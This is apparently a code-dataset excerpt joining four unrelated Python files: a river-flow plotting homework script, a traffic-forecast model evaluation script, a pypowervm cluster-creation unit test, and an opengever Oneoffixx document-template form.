'8', '10', '12'])\n plt.savefig('graphs/flow-set1_%d'%(d))\n\n \n# x = list(range(1, 32))\n# print(x)\n\n\n# print(flow_data.size)\n# print(flow_data.shape)\n# flow_202009 = flow_data[11571:11585, 3]\n# print(flow_202009)\n\n# x = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\n# fig9 = plt.figure()\n# fig9.patch.set_facecolor('xkcd:mint green')\n# plt.plot(x, flow_202009)\n# plt.xlabel('days in September 2020')\n# plt.ylabel('flow')\n# plt.legend()\n# plt.savefig('graphs/flow_202009')\n\n# %%\n# 4, 6, 9, 11\nfor d in range(2010, 2020):\n fig2 = plt.figure()\n fig2.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (4, 6, 9, 11):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6', '9', '11'])\n plt.savefig('graphs/flow-set2_%d'%(d))\n# %%\n# 2020\n\nfig3 = plt.figure()\nfig3.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (1, 3, 5, 7, 8):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['1', '3', '5', '7', '8'])\n plt.savefig('graphs/flow-set3_2020-%i'%(i))\n\ndata.flow[(data.year == 2020) & (data.month == 1)]\n\nfig4 = plt.figure()\nfig4.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (4, 6):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6'])\n plt.savefig('graphs/flow-set4_2020-%i'%(i))\n# %%\n# When September Ends\nx = list(range(1, 27))\nfig5 = plt.figure()\nfig5.patch.set_facecolor('xkcd:mint green')\nplt.title('2020-9')\nplt.ylabel('flow')\nplt.plot(x, (data.flow[(data.year == 
2020) & (data.month == 9)]))\nplt.xlabel('days in the month')\nplt.legend([])\nplt.savefig('graphs/flow-set5_2020-9')\n\nprint((data.flow[(data.year == 2020) & (data.month == 9)]))\n# %%\n", "sub_path": "assignment_5/week5_pandas_starter_BM.py", "file_name": "week5_pandas_starter_BM.py", "file_ext": "py", "file_size_in_byte": 4760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 122, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "499603482", "text": "import os\nimport sys\nimport torch\nfrom collections import defaultdict\nimport json\nimport pickle\nimport logging\nlogging.basicConfig()\n\nsys.path.append(os.getcwd())\nfrom generalization_config import config\nfrom utils.graph_utils import create_adj_matrix, blockify_A, create_coordinate_channel, \\\n create_edge_index_from_adjacency_matrix\nfrom utils.training_gcn_utils import validate\nfrom utils.training_unet_utils import validate as validate_unet\nfrom utils.videoloader import trafic4cast_dataset\n\n\nfrom models.unet import UNet\nfrom models.graph_models import KipfNet_orig, KipfNet, KipfNetd2, Graph_resnet\n\n\n\ndef get_graphdata_obj(inputs, edge_index, y, num_features=38, num_classes=9):\n graphdata 
= Data(x=inputs, edge_index=edge_index, y=y)\n\n return graphdata\n\n\ndef get_n_params(model):\n pp = 0\n for p in list(model.parameters()):\n nn = 1\n for s in list(p.size()):\n nn = nn * s\n pp += nn\n return pp\n\n\nif __name__ == \"__main__\":\n print('batch_size: ', config['dataloader']['batch_size'])\n print(config['device_num'])\n device = torch.device(config['device_num'])\n\n model_tuple_list = config['model_tuple_list']\n\n resultdict = defaultdict(dict)\n\n for city in ['Berlin', 'Moscow', 'Istanbul']:\n config['dataset']['cities'] = [city]\n\n dataset_val = trafic4cast_dataset(split_type='validation', **config['dataset'],\n reduce=True, filter_test_times=True)\n\n val_loader = torch.utils.data.DataLoader(dataset_val, shuffle=False,\n **config['dataloader'])\n\n for model_tuple in model_tuple_list:\n model_plot_name = model_tuple[0]\n model_path = model_tuple[1]\n is_graph = model_tuple[2]\n graph_model_name = model_tuple[3]\n\n with open(os.path.join(model_path, 'config.json'), 'r') as f:\n model_config = json.load(f)\n\n adj, nn_ixs, G, mask = create_adj_matrix(city=config['dataset']['cities'][0],\n mask_threshold=config['mask_threshold'])\n\n if not is_graph:\n model_config['model']['batch_norm'] = True\n model = UNet(**model_config['model']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = torch.from_numpy(mask).to(device)\n\n if 'MIE-Lab' in model_plot_name:\n norm = False\n else:\n norm = True\n\n val_loss = validate_unet(model=model, val_loader=val_loader, device=device, mask=mask,\n config=model_config, print_loss=False, norm=norm)\n\n if is_graph:\n\n n_features = 38\n batch_size = config['dataloader']['batch_size']\n assert batch_size == 1, \"batch_size should be 1 for graphs\"\n\n coords = create_coordinate_channel(b=batch_size)\n\n if config['dataloader']['batch_size'] > 1:\n adj = blockify_A(adj, config['dataloader']['batch_size'])\n\n edge_index = create_edge_index_from_adjacency_matrix(adj)\n edge_index = edge_index.to(device)\n\n if graph_model_name == 'kipfnet':\n model = KipfNet_orig(num_features=n_features,\n num_classes=9, **model_config['model']['KIPF']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet':\n model = KipfNet(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'skipfnet2d':\n model = KipfNetd2(num_features=n_features,\n num_classes=9, **model_config['model']['KipfNetd2']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n elif graph_model_name == 'Graph_resnet':\n model = Graph_resnet(num_features=n_features,\n num_classes=9, **model_config['model']['Graph_resnet']).to(device)\n model.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pt'),\n map_location=device))\n\n mask = None\n val_loss = validate(model=model, val_loader=val_loader, device=device,\n adj=adj, nn_ixs=nn_ixs, edge_index=edge_index, coords=coords,\n mask=mask, batch_size=batch_size, print_loss=False)\n\n print(\"Validation loss {}: {} = {:.2f}\".format(city, model_plot_name, val_loss))\n resultdict[model_plot_name][city] = val_loss\n\n nb_params = get_n_params(model)\n resultdict[model_plot_name]['nb_params'] = nb_params\n\n pickle.dump(resultdict, 
open(os.path.join('.', 'output', 'data_generalization.p'), 'wb'))\n", "sub_path": "experiment/generalization.py", "file_name": "generalization.py", "file_ext": "py", "file_size_in_byte": 5807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 41, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 43, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 43, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 45, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 47, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.videoloader.trafic4cast_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 55, "usage_type": "attribute"}, {"api_name": "generalization_config.config", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.graph_utils.create_adj_matrix", "line_number": 67, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 67, "usage_type": "name"}, {"api_name": "generalization_config.config", "line_number": 68, "usage_type": "name"}, {"api_name": "models.unet.UNet", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.training_unet_utils.validate", "line_number": 83, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 89, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_coordinate_channel", "line_number": 92, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 94, "usage_type": "name"}, {"api_name": "utils.graph_utils.blockify_A", "line_number": 95, "usage_type": "call"}, {"api_name": "generalization_config.config", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.graph_utils.create_edge_index_from_adjacency_matrix", "line_number": 97, "usage_type": "call"}, {"api_name": "models.graph_models.KipfNet_orig", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNet", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 109, 
"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.graph_models.KipfNetd2", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.graph_models.Graph_resnet", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utils.training_gcn_utils.validate", "line_number": 125, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}]} +{"seq_id": "252197386", "text": "# Copyright 2015 IBM Corp.\n#\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport unittest\n\nimport mock\n\nimport pypowervm.entities as ent\nimport pypowervm.tasks.cluster_ssp as cs\nimport pypowervm.tests.tasks.util as tju\nimport pypowervm.util as u\nimport pypowervm.wrappers.cluster as clust\nimport pypowervm.wrappers.job as jwrap\nimport pypowervm.wrappers.storage as stor\n\nCREATE_CLUSTER = 'cluster_create_job_template.txt'\n\n\nclass TestClusterSSP(unittest.TestCase):\n\n @mock.patch('pypowervm.wrappers.job.Job.delete_job')\n @mock.patch('pypowervm.wrappers.job.Job._monitor_job')\n @mock.patch('pypowervm.wrappers.job.Job.job_status')\n @mock.patch('pypowervm.adapter.Adapter')\n def test_crt_cluster_ssp(self, mock_adp, mock_status, mock_monitor_job,\n mock_del_job):\n # Load up GET Cluster/do/Create (job template)\n mock_adp.read.return_value = tju.load_file(CREATE_CLUSTER, mock_adp)\n # We'll pretend the job ran and completed successfully\n mock_monitor_job.return_value = False\n mock_status.__get__ = mock.Mock(\n return_value=jwrap.JobStatus.COMPLETED_OK)\n\n # Mock Job.create_job to check job parameter values\n def create_job(job_el, entry_type, *args, **kwargs):\n self.assertEqual(entry_type, clust.Cluster.schema_type)\n job = jwrap.Job.wrap(ent.Entry({}, job_el, None))\n param_vals = job._get_vals(u.xpath(\n 'JobParameters', 'JobParameter', 'ParameterValue'))\n self.assertEqual(\n param_vals[0],\n 'clust_namerepos_pv_namevios15XXXXYYYZZZZZZZ')\n self.assertEqual(\n param_vals[1],\n '<'\n 'uom:Metadata>hdisk1'\n 'hdisk2hdisk3ssp'\n '_name')\n return mock.MagicMock()\n mock_adp.create_job.side_effect = create_job\n node = clust.Node.bld(\n mock_adp, hostname='vios1', lpar_id=5, mtms='XXXX-YYY*ZZZZZZZ',\n vios_uri='https://a.example.com:12443/rest/api/uom/VirtualIOServe'\n 'r/12345678-1234-1234-1234-123456789012')\n repos = stor.PV.bld(mock_adp, 
name='repos_pv_name')\n data = [stor.PV.bld(mock_adp, name=n) for n in (\n 'hdisk1', 'hdisk2', 'hdisk3')]\n cs.crt_cluster_ssp('clust_name', 'ssp_name', repos, node, data)\n # run_job() should run delete_job() at the end\n self.assertEqual(mock_del_job.call_count, 1)\n", "sub_path": "pypowervm/tests/tasks/test_cluster_ssp.py", "file_name": "test_cluster_ssp.py", "file_ext": "py", "file_size_in_byte": 5123, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pypowervm.tests.tasks.util.load_file", "line_number": 41, "usage_type": "call"}, {"api_name": "pypowervm.tests.tasks.util", "line_number": 41, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.JobStatus", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 45, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.cluster.Cluster", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 49, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.job.Job.wrap", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.job.Job", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.job", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.entities.Entry", "line_number": 50, "usage_type": "call"}, {"api_name": "pypowervm.entities", "line_number": 50, "usage_type": "name"}, {"api_name": "pypowervm.util.xpath", "line_number": 51, "usage_type": "call"}, {"api_name": "pypowervm.util", "line_number": 51, "usage_type": "name"}, {"api_name": "mock.MagicMock", "line_number": 86, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node.bld", "line_number": 88, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.cluster.Node", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.cluster", "line_number": 88, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 92, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 92, "usage_type": "name"}, {"api_name": "pypowervm.wrappers.storage.PV.bld", "line_number": 93, "usage_type": "call"}, {"api_name": "pypowervm.wrappers.storage.PV", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pypowervm.wrappers.storage", "line_number": 93, "usage_type": "name"}, {"api_name": "pypowervm.tasks.cluster_ssp.crt_cluster_ssp", "line_number": 95, "usage_type": "call"}, {"api_name": "pypowervm.tasks.cluster_ssp", "line_number": 95, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 36, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "111741236", "text": "from copy import deepcopy\nfrom opengever.base.schema import TableChoice\nfrom opengever.oneoffixx import _\nfrom opengever.oneoffixx.api_client import OneoffixxAPIClient\nfrom opengever.oneoffixx.command import CreateDocumentFromOneOffixxTemplateCommand\nfrom opengever.oneoffixx.utils import whitelisted_template_types\nfrom plone.i18n.normalizer.interfaces import 
IFileNameNormalizer\nfrom plone.supermodel import model\nfrom plone.z3cform.layout import FormWrapper\nfrom z3c.form import button\nfrom z3c.form.field import Fields\nfrom z3c.form.form import Form\nfrom zope import schema\nfrom zope.component import getUtility\nfrom zope.i18n import translate\nfrom zope.interface import provider\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\ndef get_oneoffixx_favorites():\n \"\"\"Return the user chosen favorites as a template group, if any.\"\"\"\n api_client = OneoffixxAPIClient()\n favorites = api_client.get_oneoffixx_favorites()\n if favorites.get('templates'):\n return favorites\n return None\n\n\ndef get_oneoffixx_template_groups():\n \"\"\"Return the template groups.\n\n Potentially amended with user chosen favorites.\n \"\"\"\n api_client = OneoffixxAPIClient()\n # We need to work on a copy to not pollute the cached one\n template_groups = deepcopy(api_client.get_oneoffixx_template_groups())\n favorites = get_oneoffixx_favorites()\n if favorites:\n template_groups.insert(0, favorites)\n return template_groups\n\n\ndef get_oneoffixx_templates():\n \"\"\"Return all oneoffixx templates.\n\n We do not want duplicates from favorites here.\n \"\"\"\n api_client = OneoffixxAPIClient()\n return (\n OneOffixxTemplate(template, template_group.get('localizedName', ''))\n for template_group in api_client.get_oneoffixx_template_groups()\n for template in template_group.get(\"templates\")\n if template.get('metaTemplateId') in whitelisted_template_types\n )\n\n\ndef default_template_group():\n \"\"\"Return all templates, or the user favorites, if defined by user.\"\"\"\n favorites = get_oneoffixx_favorites()\n if favorites:\n return favorites.get('id')\n return None\n\n\n@provider(IContextSourceBinder)\ndef list_templates(context):\n \"\"\"Return a list available templates.\"\"\"\n templates = get_oneoffixx_templates()\n template_group = context.REQUEST.form.get('form.widgets.template_group')\n terms = []\n\n for template in templates:\n terms.append(SimpleVocabulary.createTerm(\n template, template.template_id, template.title))\n\n # We filter templates when template_group has been selected\n if template_group is not None:\n favorites = get_oneoffixx_favorites()\n # Favorites are a special case\n if favorites and template_group[0] == favorites.get('id'):\n terms = [\n SimpleVocabulary.createTerm(\n OneOffixxTemplate(\n template, favorites.get('localizedName', '')),\n template.get('id'),\n template.get('localizedName'),\n )\n for template in favorites.get('templates')\n ]\n elif template_group[0] != '--NOVALUE--':\n terms = [term for term in terms if term.value.group == template_group[0]]\n\n return MutableObjectVocabulary(terms)\n\n\n@provider(IContextSourceBinder)\ndef list_template_groups(context):\n \"\"\"Return the list of available template groups.\"\"\"\n template_groups = get_oneoffixx_template_groups()\n terms = []\n for group in template_groups:\n terms.append(SimpleVocabulary.createTerm(group.get(\"id\"),\n group.get(\"id\"),\n group.get(\"localizedName\")))\n return MutableObjectVocabulary(terms)\n\n\nclass OneOffixxTemplate(object):\n\n def __init__(self, template, groupname):\n self.title = template.get(\"localizedName\")\n self.template_id = template.get(\"id\")\n self.group = template.get('templateGroupId')\n self.groupname = groupname\n template_type = template['metaTemplateId']\n template_type_info = whitelisted_template_types[template_type]\n self.content_type = 
template_type_info['content-type']\n filename = template.get(\"localizedName\")\n normalizer = getUtility(IFileNameNormalizer, name='gever_filename_normalizer')\n self.filename = normalizer.normalize(filename, extension=template_type_info['extension'])\n self.languages = template.get(\"languages\")\n\n def __eq__(self, other):\n if type(other) == type(self):\n return self.template_id == other.template_id\n return False\n\n\nclass MutableObjectVocabulary(SimpleVocabulary):\n\n def __contains__(self, value):\n try:\n return any([value == val for val in self.by_value])\n except TypeError:\n return False\n\n\nclass ICreateDocumentFromOneOffixxTemplate(model.Schema):\n\n # XXX - this always renders the --NOVALUE-- as the actually chosen\n # default is actually loaded over AJAX - confusing and bad UX\n template_group = schema.Choice(\n title=_(u'label_template_group', default=u'Template group'),\n source=list_template_groups,\n required=False,\n defaultFactory=default_template_group,\n )\n\n template = TableChoice(\n title=_(u\"label_template\", default=u\"Template\"),\n source=list_templates,\n required=True,\n show_filter=True,\n vocabulary_depends_on=['form.widgets.template_group'],\n columns=(\n {'column': 'title',\n 'column_title': _(u'label_title', default=u'Title'),\n 'sort_index': 'sortable_title'},\n )\n )\n\n title = schema.TextLine(\n title=_(u\"label_title\", default=u\"Title\"),\n required=True)\n\n\nclass SelectOneOffixxTemplateDocumentWizardStep(Form):\n\n label = _(u'create_document_with_template', default=u'Create document from template')\n ignoreContext = True\n fields = Fields(ICreateDocumentFromOneOffixxTemplate)\n\n def updateWidgets(self, prefix=None):\n super(SelectOneOffixxTemplateDocumentWizardStep, self).updateWidgets(prefix=prefix)\n self.widgets['template_group'].noValueMessage = translate(\n _(u'label_all_template_groups', default=u'All templates'), context=self.request)\n\n def finish_document_creation(self, data):\n new_doc = self.create_document(data)\n self.activate_external_editing(new_doc)\n return self.request.RESPONSE.redirect(new_doc.absolute_url())\n\n def activate_external_editing(self, new_doc):\n \"\"\"Add the oneoffixx external_editor URL to redirector queue.\"\"\"\n new_doc.setup_external_edit_redirect(self.request, action=\"oneoffixx\")\n\n def create_document(self, data):\n \"\"\"Create a new document based on a template.\"\"\"\n command = CreateDocumentFromOneOffixxTemplateCommand(self.context, data['title'], data['template'])\n return command.execute()\n\n @button.buttonAndHandler(_('button_save', default=u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n\n if not errors:\n return self.finish_document_creation(data)\n\n self.status = self.formErrorsMessage\n return None\n\n @button.buttonAndHandler(_(u'button_cancel', default=u'Cancel'), name='cancel')\n def cancel(self, action):\n return self.request.RESPONSE.redirect(self.context.absolute_url())\n\n\nclass SelectOneOffixxTemplateDocumentView(FormWrapper):\n\n form = SelectOneOffixxTemplateDocumentWizardStep\n", "sub_path": "opengever/oneoffixx/browser/form.py", "file_name": "form.py", "file_ext": "py", "file_size_in_byte": 7651, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 23, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 35, "usage_type": "call"}, 
{"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.api_client.OneoffixxAPIClient", "line_number": 49, "usage_type": "call"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 54, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 74, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 74, "usage_type": "name"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 83, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 83, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 66, "usage_type": "argument"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary.createTerm", "line_number": 103, "usage_type": "call"}, {"api_name": "zope.schema.vocabulary.SimpleVocabulary", "line_number": 103, "usage_type": "name"}, {"api_name": "zope.interface.provider", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.schema.interfaces.IContextSourceBinder", "line_number": 97, "usage_type": "argument"}, {"api_name": "opengever.oneoffixx.utils.whitelisted_template_types", "line_number": 117, "usage_type": "name"}, {"api_name": 